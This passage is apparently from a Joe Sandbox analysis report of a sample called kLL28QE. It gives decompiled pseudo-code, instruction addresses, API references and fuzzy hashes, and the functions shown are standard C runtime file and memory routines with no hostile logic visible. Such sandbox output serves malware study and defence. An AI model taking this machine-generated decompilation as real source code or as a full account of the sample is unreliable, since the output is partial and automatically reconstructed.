                                                                                                                                                                                                      															 *_t63 = _a4 + 1;
                                                                                                                                                                                                      															__eflags =  *_t63;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L39;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													_t94 =  *(_t104 + 0xc);
                                                                                                                                                                                                      													__eflags = _t94 & 0x00000008;
                                                                                                                                                                                                      													if((_t94 & 0x00000008) == 0) {
                                                                                                                                                                                                      														goto L35;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t94 & 0x00000400;
                                                                                                                                                                                                      													if((_t94 & 0x00000400) == 0) {
                                                                                                                                                                                                      														goto L36;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													goto L35;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												L31:
                                                                                                                                                                                                      												_t75 = _t81 | 0xffffffff;
                                                                                                                                                                                                      												goto L41;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t84 =  *(_t104 + 8);
                                                                                                                                                                                                      											_t96 = _a4 + _t84;
                                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                                      												__eflags = _t84 - _t96;
                                                                                                                                                                                                      												if(_t84 >= _t96) {
                                                                                                                                                                                                      													break;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags =  *_t84 - 0xa;
                                                                                                                                                                                                      												if( *_t84 == 0xa) {
                                                                                                                                                                                                      													_t44 =  &_a4;
                                                                                                                                                                                                      													 *_t44 = _a4 + 1;
                                                                                                                                                                                                      													__eflags =  *_t44;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t84 = _t84 + 1;
                                                                                                                                                                                                      												__eflags = _t84;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_v16 = _t87;
                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t75 = _v16;
                                                                                                                                                                                                      									goto L41;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t81 = E0040BFC1(__eflags);
                                                                                                                                                                                                      								 *_t81 = 0x16;
                                                                                                                                                                                                      								goto L31;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                                                                                                                                                      							_t114 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                      							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                                                                                                                                                      							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                                                                                                                                                      								goto L15;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t103 = _t92;
                                                                                                                                                                                                      							__eflags = _t103 - _t73;
                                                                                                                                                                                                      							if(_t103 >= _t73) {
                                                                                                                                                                                                      								goto L15;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t115 = _t73;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								__eflags =  *_t103 - 0xa;
                                                                                                                                                                                                      								if( *_t103 == 0xa) {
                                                                                                                                                                                                      									_v16 = _v16 + 1;
                                                                                                                                                                                                      									_t87 = 0;
                                                                                                                                                                                                      									__eflags = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t103 = _t103 + 1;
                                                                                                                                                                                                      								__eflags = _t103 - _t115;
                                                                                                                                                                                                      							} while (_t103 < _t115);
                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						return _t71 -  *(_t104 + 4);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t86 = E0040BFC1(_t121);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				 *_t86 = 0x16;
                                                                                                                                                                                                      				_t71 = E0040E744(__edx, _t104, __esi);
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      0x0040c8a1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c8a1
                                                                                                                                                                                                      0x0040c86d
                                                                                                                                                                                                      0x0040c873
                                                                                                                                                                                                      0x0040c880
                                                                                                                                                                                                      0x0040c880
                                                                                                                                                                                                      0x0040c882
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c877
                                                                                                                                                                                                      0x0040c87a
                                                                                                                                                                                                      0x0040c87c
                                                                                                                                                                                                      0x0040c87c
                                                                                                                                                                                                      0x0040c87c
                                                                                                                                                                                                      0x0040c87c
                                                                                                                                                                                                      0x0040c87f
                                                                                                                                                                                                      0x0040c87f
                                                                                                                                                                                                      0x0040c87f
                                                                                                                                                                                                      0x0040c884
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c884
                                                                                                                                                                                                      0x0040c82b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c82b
                                                                                                                                                                                                      0x0040c7fe
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7fe
                                                                                                                                                                                                      0x0040c80a
                                                                                                                                                                                                      0x0040c80f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c80f
                                                                                                                                                                                                      0x0040c7ce
                                                                                                                                                                                                      0x0040c7d8
                                                                                                                                                                                                      0x0040c7db
                                                                                                                                                                                                      0x0040c7e0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7e2
                                                                                                                                                                                                      0x0040c7e4
                                                                                                                                                                                                      0x0040c7e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7e8
                                                                                                                                                                                                      0x0040c7ea
                                                                                                                                                                                                      0x0040c7ea
                                                                                                                                                                                                      0x0040c7ed
                                                                                                                                                                                                      0x0040c7ef
                                                                                                                                                                                                      0x0040c7f2
                                                                                                                                                                                                      0x0040c7f2
                                                                                                                                                                                                      0x0040c7f2
                                                                                                                                                                                                      0x0040c7f4
                                                                                                                                                                                                      0x0040c7f5
                                                                                                                                                                                                      0x0040c7f5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7ea
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7ab
                                                                                                                                                                                                      0x0040c79e
                                                                                                                                                                                                      0x0040c75b
                                                                                                                                                                                                      0x0040c760
                                                                                                                                                                                                      0x0040c761
                                                                                                                                                                                                      0x0040c762
                                                                                                                                                                                                      0x0040c763
                                                                                                                                                                                                      0x0040c764
                                                                                                                                                                                                      0x0040c765
                                                                                                                                                                                                      0x0040c76b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                      • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2395185920-0
                                                                                                                                                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                                                                      			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t30;
                                                                                                                                                                                                      				signed int _t31;
                                                                                                                                                                                                      				signed int _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                      				signed int* _t53;
                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                      				void* _t55;
                                                                                                                                                                                                      				void* _t57;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t54 = __ebp;
                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                      				_t42 = __ebx;
                                                                                                                                                                                                      				_t53 = _a4;
                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                      					L40:
                                                                                                                                                                                                      					_t31 = _t30 | 0xffffffff;
                                                                                                                                                                                                      					__eflags = _t31;
                                                                                                                                                                                                      					return _t31;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t43 = _a12;
                                                                                                                                                                                                      					if(_t43 == 2) {
                                                                                                                                                                                                      						goto L40;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t30 = _t53[0xe];
                                                                                                                                                                                                      						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                                                                                                                      							goto L40;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t48 = _a8;
                                                                                                                                                                                                      							if(_t53[0x17] != 0x77) {
                                                                                                                                                                                                      								__eflags = _t43 - 1;
                                                                                                                                                                                                      								if(_t43 == 1) {
                                                                                                                                                                                                      									_t48 = _t48 + _t53[0x1a];
                                                                                                                                                                                                      									__eflags = _t48;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = _t48;
                                                                                                                                                                                                      								if(_t48 < 0) {
                                                                                                                                                                                                      									goto L39;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									__eflags = _t53[0x16];
                                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                                      										_t33 = _t53[0x1a];
                                                                                                                                                                                                      										__eflags = _t48 - _t33;
                                                                                                                                                                                                      										if(_t48 < _t33) {
                                                                                                                                                                                                      											_t30 = E004054F0(_t42, _t54, _t53);
                                                                                                                                                                                                      											_t55 = _t55 + 4;
                                                                                                                                                                                                      											__eflags = _t30;
                                                                                                                                                                                                      											if(_t30 < 0) {
                                                                                                                                                                                                      												goto L39;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L27;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t48 = _t48 - _t33;
                                                                                                                                                                                                      											L27:
                                                                                                                                                                                                      											__eflags = _t48;
                                                                                                                                                                                                      											if(_t48 == 0) {
                                                                                                                                                                                                      												L38:
                                                                                                                                                                                                      												return _t53[0x1a];
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t53[0x12];
                                                                                                                                                                                                      												if(_t53[0x12] != 0) {
                                                                                                                                                                                                      													L30:
                                                                                                                                                                                                      													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                                                                                                      													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                                                                                                      														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                                                                                                      														_t48 = _t48 - 1;
                                                                                                                                                                                                      														__eflags = _t53[0x1c];
                                                                                                                                                                                                      														_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                      														if(_t53[0x1c] != 0) {
                                                                                                                                                                                                      															_t53[0xe] = 1;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t48;
                                                                                                                                                                                                      													if(_t48 <= 0) {
                                                                                                                                                                                                      														goto L38;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														while(1) {
                                                                                                                                                                                                      															_t35 = 0x4000;
                                                                                                                                                                                                      															__eflags = _t48 - 0x4000;
                                                                                                                                                                                                      															if(_t48 < 0x4000) {
                                                                                                                                                                                                      																_t35 = _t48;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                                                                                                                                                      															_t55 = _t55 + 0xc;
                                                                                                                                                                                                      															__eflags = _t30;
                                                                                                                                                                                                      															if(_t30 <= 0) {
                                                                                                                                                                                                      																goto L39;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															_t48 = _t48 - _t30;
                                                                                                                                                                                                      															__eflags = _t48;
                                                                                                                                                                                                      															if(_t48 > 0) {
                                                                                                                                                                                                      																continue;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																goto L38;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															goto L41;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L39;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                      													_t55 = _t55 + 4;
                                                                                                                                                                                                      													_t53[0x12] = _t30;
                                                                                                                                                                                                      													__eflags = _t30;
                                                                                                                                                                                                      													if(_t30 == 0) {
                                                                                                                                                                                                      														goto L39;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_push(0);
                                                                                                                                                                                                      										_push(_t48);
                                                                                                                                                                                                      										_push(_t53[0x10]);
                                                                                                                                                                                                      										_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                      										_t53[1] = 0;
                                                                                                                                                                                                      										 *_t53 = _t53[0x11];
                                                                                                                                                                                                      										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                      										if(_t30 < 0) {
                                                                                                                                                                                                      											goto L39;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t53[0x1a] = _t48;
                                                                                                                                                                                                      											_t53[0x19] = _t48;
                                                                                                                                                                                                      											return _t48;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(_t43 == 0) {
                                                                                                                                                                                                      									_t48 = _t48 - _t53[0x19];
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(_t48 < 0) {
                                                                                                                                                                                                      									L39:
                                                                                                                                                                                                      									_t32 = _t30 | 0xffffffff;
                                                                                                                                                                                                      									__eflags = _t32;
                                                                                                                                                                                                      									return _t32;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(_t53[0x11] != 0) {
                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                      										if(_t48 <= 0) {
                                                                                                                                                                                                      											L17:
                                                                                                                                                                                                      											return _t53[0x19];
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                                      												_t39 = 0x4000;
                                                                                                                                                                                                      												if(_t48 < 0x4000) {
                                                                                                                                                                                                      													_t39 = _t48;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                                                                                                      												_t55 = _t55 + 0xc;
                                                                                                                                                                                                      												if(_t30 == 0) {
                                                                                                                                                                                                      													goto L39;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t48 = _t48 - _t30;
                                                                                                                                                                                                      												if(_t48 > 0) {
                                                                                                                                                                                                      													continue;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													goto L17;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L41;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											goto L39;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                      										_t57 = _t55 + 4;
                                                                                                                                                                                                      										_t53[0x11] = _t30;
                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                      											goto L39;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                                                                                                                                                      											_t55 = _t57 + 0xc;
                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L41:
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00405d59
                                                                                                                                                                                                      0x00405d5c
                                                                                                                                                                                                      0x00405d61
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405d67
                                                                                                                                                                                                      0x00405d6f
                                                                                                                                                                                                      0x00405d74
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405d74
                                                                                                                                                                                                      0x00405d61
                                                                                                                                                                                                      0x00405d4d
                                                                                                                                                                                                      0x00405d43
                                                                                                                                                                                                      0x00405d38
                                                                                                                                                                                                      0x00405d20
                                                                                                                                                                                                      0x00405d14
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                                                                                      • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                      			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                      				intOrPtr* _t61;
                                                                                                                                                                                                      				signed int _t63;
                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                      				signed int _t75;
                                                                                                                                                                                                      				signed int _t77;
                                                                                                                                                                                                      				signed int _t78;
                                                                                                                                                                                                      				signed int _t81;
                                                                                                                                                                                                      				signed int _t82;
                                                                                                                                                                                                      				signed int _t84;
                                                                                                                                                                                                      				signed int _t88;
                                                                                                                                                                                                      				signed int _t97;
                                                                                                                                                                                                      				signed int _t98;
                                                                                                                                                                                                      				signed int _t99;
                                                                                                                                                                                                      				intOrPtr* _t100;
                                                                                                                                                                                                      				void* _t101;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t90 = __edx;
                                                                                                                                                                                                      				if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t100 = _a16;
                                                                                                                                                                                                      					_t105 = _t100;
                                                                                                                                                                                                      					if(_t100 != 0) {
                                                                                                                                                                                                      						_t82 = _a4;
                                                                                                                                                                                                      						__eflags = _t82;
                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t63 = _t59 | 0xffffffff;
                                                                                                                                                                                                      						_t90 = _t63 % _a8;
                                                                                                                                                                                                      						__eflags = _a12 - _t63 / _a8;
                                                                                                                                                                                                      						if(__eflags > 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t97 = _a8 * _a12;
                                                                                                                                                                                                      						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                                                                                                      						_v8 = _t82;
                                                                                                                                                                                                      						_v16 = _t97;
                                                                                                                                                                                                      						_t81 = _t97;
                                                                                                                                                                                                      						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                      							_v12 = 0x1000;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_v12 =  *(_t100 + 0x18);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t97;
                                                                                                                                                                                                      						if(_t97 == 0) {
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							return _a12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                                                                                                      								__eflags = _t84;
                                                                                                                                                                                                      								if(_t84 == 0) {
                                                                                                                                                                                                      									L18:
                                                                                                                                                                                                      									__eflags = _t81 - _v12;
                                                                                                                                                                                                      									if(_t81 < _v12) {
                                                                                                                                                                                                      										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                                                                                                                                                      										__eflags = _t68 - 0xffffffff;
                                                                                                                                                                                                      										if(_t68 == 0xffffffff) {
                                                                                                                                                                                                      											L34:
                                                                                                                                                                                                      											_t69 = _t97;
                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                      											return (_t69 - _t81) / _a8;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_v8 = _v8 + 1;
                                                                                                                                                                                                      										_t72 =  *(_t100 + 0x18);
                                                                                                                                                                                                      										_t81 = _t81 - 1;
                                                                                                                                                                                                      										_v12 = _t72;
                                                                                                                                                                                                      										__eflags = _t72;
                                                                                                                                                                                                      										if(_t72 <= 0) {
                                                                                                                                                                                                      											_v12 = 1;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags = _t84;
                                                                                                                                                                                                      									if(_t84 == 0) {
                                                                                                                                                                                                      										L21:
                                                                                                                                                                                                      										__eflags = _v12;
                                                                                                                                                                                                      										_t98 = _t81;
                                                                                                                                                                                                      										if(_v12 != 0) {
                                                                                                                                                                                                      											_t75 = _t81;
                                                                                                                                                                                                      											_t90 = _t75 % _v12;
                                                                                                                                                                                                      											_t98 = _t98 - _t75 % _v12;
                                                                                                                                                                                                      											__eflags = _t98;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_push(_t98);
                                                                                                                                                                                                      										_push(_v8);
                                                                                                                                                                                                      										_push(E0040FA20(_t90, _t98, _t100));
                                                                                                                                                                                                      										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                                                                                                      										_t101 = _t101 + 0xc;
                                                                                                                                                                                                      										__eflags = _t74 - 0xffffffff;
                                                                                                                                                                                                      										if(_t74 == 0xffffffff) {
                                                                                                                                                                                                      											L36:
                                                                                                                                                                                                      											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                      											_t69 = _v16;
                                                                                                                                                                                                      											goto L35;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t88 = _t98;
                                                                                                                                                                                                      											__eflags = _t74 - _t98;
                                                                                                                                                                                                      											if(_t74 <= _t98) {
                                                                                                                                                                                                      												_t88 = _t74;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_v8 = _v8 + _t88;
                                                                                                                                                                                                      											_t81 = _t81 - _t88;
                                                                                                                                                                                                      											__eflags = _t74 - _t98;
                                                                                                                                                                                                      											if(_t74 < _t98) {
                                                                                                                                                                                                      												goto L36;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												L27:
                                                                                                                                                                                                      												_t97 = _v16;
                                                                                                                                                                                                      												goto L31;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t77 = E0040C1FB(_t100);
                                                                                                                                                                                                      									__eflags = _t77;
                                                                                                                                                                                                      									if(_t77 != 0) {
                                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t78 =  *(_t100 + 4);
                                                                                                                                                                                                      								__eflags = _t78;
                                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                                      									goto L18;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                                                                      									_t48 = _t100 + 0xc;
                                                                                                                                                                                                      									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                      									__eflags =  *_t48;
                                                                                                                                                                                                      									goto L34;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t99 = _t81;
                                                                                                                                                                                                      								__eflags = _t81 - _t78;
                                                                                                                                                                                                      								if(_t81 >= _t78) {
                                                                                                                                                                                                      									_t99 = _t78;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                                                                                                      								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                                                                                                      								 *_t100 =  *_t100 + _t99;
                                                                                                                                                                                                      								_t101 = _t101 + 0xc;
                                                                                                                                                                                                      								_t81 = _t81 - _t99;
                                                                                                                                                                                                      								_v8 = _v8 + _t99;
                                                                                                                                                                                                      								goto L27;
                                                                                                                                                                                                      								L31:
                                                                                                                                                                                                      								__eflags = _t81;
                                                                                                                                                                                                      							} while (_t81 != 0);
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t61 = E0040BFC1(_t105);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					 *_t61 = 0x16;
                                                                                                                                                                                                      					E0040E744(_t90, 0, _t100);
                                                                                                                                                                                                      					goto L4;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





























                                                                                                                                                                                                      0x0040bba4
                                                                                                                                                                                                      0x0040bba6
                                                                                                                                                                                                      0x0040bba8
                                                                                                                                                                                                      0x0040bba8
                                                                                                                                                                                                      0x0040bbaa
                                                                                                                                                                                                      0x0040bbad
                                                                                                                                                                                                      0x0040bbaf
                                                                                                                                                                                                      0x0040bbb1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                                                      0x0040bbb1
                                                                                                                                                                                                      0x0040bba0
                                                                                                                                                                                                      0x0040bb6e
                                                                                                                                                                                                      0x0040bb74
                                                                                                                                                                                                      0x0040bb76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bb76
                                                                                                                                                                                                      0x0040bb35
